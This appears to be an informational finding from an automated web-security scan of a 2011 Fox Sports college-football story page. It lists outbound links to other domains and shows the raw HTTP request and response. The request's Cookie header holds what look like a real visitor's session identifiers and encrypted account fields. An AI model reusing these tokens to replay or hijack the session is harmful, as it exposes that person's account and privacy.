                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.8. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 247816
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=21
Date: Sat, 08 Jan 2011 00:47:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
